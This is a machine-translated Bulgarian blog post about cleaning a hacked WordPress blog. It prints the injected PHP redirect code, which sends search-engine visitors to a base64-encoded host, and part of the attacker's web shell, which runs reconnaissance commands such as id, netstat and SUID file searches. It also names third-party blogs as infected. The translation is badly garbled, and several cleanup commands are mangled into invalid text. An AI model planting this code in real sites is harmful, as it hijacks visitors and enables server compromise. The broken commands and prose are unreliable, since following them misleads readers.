През последния месец, че сте получили предупреждения вируса блог в някои посетители. Първоначално I игнорира предупрежденията, защото инсталира доста добра антивирусна (Kaspersky AV 2009) И въпреки че в блога за дълго време, никога не съм се вирус предупреждение (.. видях нещо подозрително по-рано, че първото опресняване изчезна. Накрая ...).
Бавно започнаха да се появяват големи вариации посетител трафикСлед което трафика напоследък е паднал постоянно и започна да се все повече и повече хора, които ми казват, че stealthsettings.com е virused. Вчера получих от някой, на екрана се прави, когато антивирусен блокира писменост от stealthsettings.com:Trojan-Clicker.HTML.IFrame.gr. Тя беше доста убедителни за мен, че сложих всички източници избраните. Първата идея, която ми хрумна е да се направи ъпгрейд най-новата версия на WordPress (2.5.1), но не и преди да изтриете всички файлове в стария скрипт WordPress и да направим резервната база данни. Тази процедура не работи и вероятно ми отне много време, за да разбера къде е грешката, ако не ми беше казала. Eugen в дискусия с чаша кафе, той открил връзка Google и би било добре да го види.
MyDigitalLife.info, публикува статия, озаглавена: „WordPress Хакване: Възстановете и коригирайте Google и търсачката или без трафик от бисквитки, пренасочен към Your-Needs.info, AnyResults.Net, Golden-Info.net и други незаконни сайтове"Това е краят на конеца, имах нужда.
Става дума за използват de WordPress на базата на бисквитки, Което според мен е много сложна и направи книгата. Достатъчно умен, за да се направи SQL Injection База данни на блога, да се създаде една невидима потребителя лесна проверка на рутинна Табло->Потребители, проверка на сървъра директории и файлове "писане" (че chmod 777), за търсене и за изпълнявам файлове с привилегиите на корен потребител или група. Аз не знам кой използва името и видите, че има няколко статии, написани за него, въпреки факта, че много блогове са заразени, включително Румъния. Добре ... Ще се опитам да се опитам да обясня общи за вируса.
Какво е вирус?
Първо, поставете източници страници за блогове, линкове невидими за посетителите, но видимо и индексиране за търсачките, особено Google. По този начин прехвърляте страница ранг към сайтове, посочени от нападателя. Второ, вмъква се друг пренасочване код URL за посетители, идващи от Google, Live, Yahoo, ... или RSS четец, а не на сайта курабийка. A антивирусен разпознава като пренасочване Trojan-Clicker.HTML.
Симптоми:
Massive спад на посетител трафик, Особено в блогове, където повечето посетители идват от Google.
Идентификация: (тук проблемът се усложнява за тези, които не знаят много за phpmyadmin, php и linux)
LA. ВНИМАНИЕ! Първо направете резервната база данни!
1. Проверка на изходните файлове index.php, header.php, footer.php, The блог тема и да видим дали има код, който използва шифроване base64 или съдържа „if ($ ser ==” 1? && sizeof ($ _ COOKIE) == 0) “във формата:
<?php
$seref=array(”google”,”msn”,”live”,”altavista”,
”ask”,”yahoo”,”aol”,”cnn”,”weather”,”alexa”);
$ser=0; foreach($seref as $ref)
if(strpos(strtolower
($_SERVER[’HTTP_REFERER’]),$ref)!==false){ $ser=”1?; break; }
if($ser==”1? && sizeof($_COOKIE)==0){ header(”Location: http://”.base64_decode(”YW55cmVzdWx0cy5uZXQ=”).”/”); exit;
}?>... Или нещо такова. Изтрий този код!
Кликнете върху изображението ...
В горната екранна снимка случайно избрах и " ". Този код трябва да остане.
2. Употреба PhpMyAdmin и да отидете в таблица от база данни wp_usersКогато проверите, ако няма потребителско име създадена на 00:00:00 0000-00-00 (Възможни разположение user_login да пишеш "WordPress“. Запишете ID на този потребител (поле ID) и след това го изтрийте.
Кликнете върху изображението ...
* Зелената линия трябва да бъдат отстранени и запазил ID. В случай на сънливБеше ID = 8 .
3. Отиди до масата wp_usermeta, Къде да разположен и неговата премахване линии за ID (когато полето user_id ID стойност се появява заличава).
4. В таблица wp_option, Отиди на active_plugins и да видим какво плъгин е активиран заподозрян. Може да се използва като окончания _old.giff, _old.pngg, _old.jpeg, _new.php.giffи др. комбинации от фалшиви разширения на изображения със _old и _new.
SELECT * FROM wp_options WHERE option_name = 'active_plugins'Изтрийте този плъгин, след това отидете в блога -> Табло за управление -> Приставки, където деактивирате и активирате всеки плъгин.
Кликнете върху изображението, за да видите, че се появява active_plugins вирус файл.
Следвайте пътя на FTP или SSH, посочени в active_plugins и изтриете файла от сървъра.
5. Всички в PhpMyAdmin, в таблица wp_option, Намиране и изтриване на ред, съдържащ "rss_f541b3abd05e7962fcab37737f40fad8"И сред"internal_links_cache ".
В internal_links_cache са криптирани връзки спам, които се появяват в блога си и код на Google Adsтил, Хакер.
6. Препоръчително е да се смените паролата Блог и вход премахнете всички подозрителни userele. Надстройте до най-новата версия на WordPress и настройте блога да спре да регистрира нови потребители. Няма загуба... могат да коментират и необитаеми.
Опитах се по-горе да обясня малко, какво да правя в такава ситуация, да почистя блога от този вирус. Проблемът е много по-сериозен, отколкото изглежда и почти не е решен, защото те се използват уязвимости в сигурността на уеб сървър хостинг, който е блог.
Като първа мярка за сигурност, с достъп SSH, Направете някои проверки на сървъра, за да видите дали някои файлове като * _old * и * _new. * С окончания.giff,. JPEG,. pngg,. jpgg. Тези файлове трябва да бъдат заличени. Ако преименувате даден файл, например. top_right_old.giff in top_right_old.phpНие виждаме, че файлът е точно сървъра експлойт код.
Някои полезни инструкции за проверка, почистване и защита на сървъра. (чрез SSH)
1. CD / TMP и проверете дали има папки като tmpVFlma или други комбинации има същото име и да го изтриете. Вижте снимката по-долу, две такива папки от мен:
RM-RF FOLDERNAME
2. Проверете и елиминирайте (променете chmod-ul) колкото е възможно папките с атрибути chmod 777
намери всички записваеми файлове в текущата директория: Намери. -Type F-къдрене-2-LS
намерите всички записваеми директории в текущата директория: Намери. -Type г-къдрене-2-LS
намери всички записваеми директории и файлове в текущата директория: Намери. -Перм-2-LS
3. Търся подозрителни файлове на сървъра.
find . -name "*_new.php*"
find . -name "*_old.php*"
find . -name "*.jpgg"
find . -name "*_giff"
find . -name "*_pngg"4, ВНИМАНИЕ! файловете, които са били определени битов SUID si SGID. Тези файлове се изпълняват с правата на потребител (група) или корен, а не на потребителя, който изпълни файла. Тези файлове може да доведе до корен компромис, ако проблемите на сигурността. Ако използвате файлове с SUID и SGID бита, изпълнява "chmod 0 " на или деинсталирате пакета, които ги съдържат.
Подвиг съдържа някъде в източник ...:
if(!$safe_mode){
if($os_type == 'nix'){
$os .= execute('sysctl -n kern.ostype');
$os .= execute('sysctl -n kern.osrelease');
$os .= execute('sysctl -n kernel.ostype');
$os .= execute('sysctl -n kernel.osrelease');
if(empty($user)) $user = execute('id');
$aliases = array(
'' => '',
'find suid files'=>'find / -type f -perm -04000 -ls',
'find sgid files'=>'find / -type f -perm -02000 -ls',
'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
'show opened ports'=>'netstat -an | grep -i listen',
);
}else{
$os_name .= execute('ver');
$user .= execute('echo %username%');
$aliases = array(
'' => '',
'show runing services' => 'net start',
'show process list' => 'tasklist'
);
}По този начин ... основно установи нарушения в сигурността. Пристанища, отворени директории "писане" и група за изпълнение привилегии файлове / корен.
Обратно с повече ...
Някои заразени блогове: www.blegoo.com, www.visurat.ro,
fulgerica.com, denisuca.com, www.ecostin.com,
www.razvanmatasel.ro,
blog.hrmarket.ro, www.nitza.ro,
motorcycles.motomag.ro,
emi.brainient.com, www.picsel.ro,
www.mihaidragan.ro/kindablog/,
krumel.seo-point.com, www.itex.ro/blog,
www.radiology.ro,
www.dipse.ro/ionut/,
www.vinul.ro/blog/, www.damaideparte.ro,
dragos.roua.ro, www.artistul.ro/blog/,
www.mirabilismedia.ro/blog, blog.einvest.ro
... Списъкът продължава ... много.
Можете да проверите дали даден блог е заразен с помощта на търсачката на Google. Копирай постави:
сайт www.blegoo.com изкупуване
Лека нощ и добра работа;) Скоро мисля, че Ойген ще дойде с новини, на prevezibil.imprevizibil.com.
BRB :)
ВНИМАНИЕ! Промяна на темата на WordPress или надстройте до WordPress 2.5.1, НЕ е решение да се отървете от този вирус.
